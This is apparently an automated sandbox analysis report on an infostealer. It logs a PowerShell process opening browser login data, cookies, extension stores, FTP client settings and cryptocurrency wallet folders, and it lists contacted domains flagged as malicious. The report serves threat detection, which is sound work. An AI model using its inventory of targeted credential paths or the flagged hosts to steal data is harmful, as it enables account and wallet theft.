Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\formhistory.sqlite
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\logins.json
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\prefs.js
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cert9.db
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\key4.db
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Tries to harvest and steal ftp login credentials
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Tries to steal Crypto Currency Wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.17.24.14
 cdnjs.cloudflare.com United States
13335 CLOUDFLARENETUS false
216.58.212.131
 unknown United States
15169 GOOGLEUS false
172.217.18.3
 unknown United States
15169 GOOGLEUS false
142.250.185.132
 www.google.com United States
15169 GOOGLEUS false
172.67.194.161
 e1.foiloverturnarrival.shop United States
13335 CLOUDFLARENETUS true
64.233.167.84
 unknown United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
188.114.97.3
 escooterzone.com European Union
13335 CLOUDFLARENETUS true
142.250.185.163
 unknown United States
15169 GOOGLEUS false
142.250.185.131
 unknown United States
15169 GOOGLEUS false
172.67.151.250
 agiledeals.shop United States
13335 CLOUDFLARENETUS true
142.250.186.142
 unknown United States
15169 GOOGLEUS false
35.190.80.1
 a.nel.cloudflare.com United States
15169 GOOGLEUS false
2.23.242.162
 unknown European Union
8781 QA-ISPQA false
172.217.18.110
 unknown United States
15169 GOOGLEUS false
172.67.216.225
 veilyspen.shop United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.17
127.0.0.1

Contacted Domains

Name IP Active
e1.foiloverturnarrival.shop 172.67.194.161 true
escooterzone.com 188.114.97.3 true
a.nel.cloudflare.com 35.190.80.1 true
veilyspen.shop 172.67.216.225 true
cdnjs.cloudflare.com 104.17.24.14 true
s-part-t-9999.t-msedge.net 13.107.246.254 true
www.google.com 142.250.185.132 true
arm-9999.arm-msedge.net 4.150.240.254 true
agiledeals.shop 172.67.151.250 true
wac-9999.wac-msedge.net 52.108.8.254 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://escooterzone.com/play.html true
    		unknown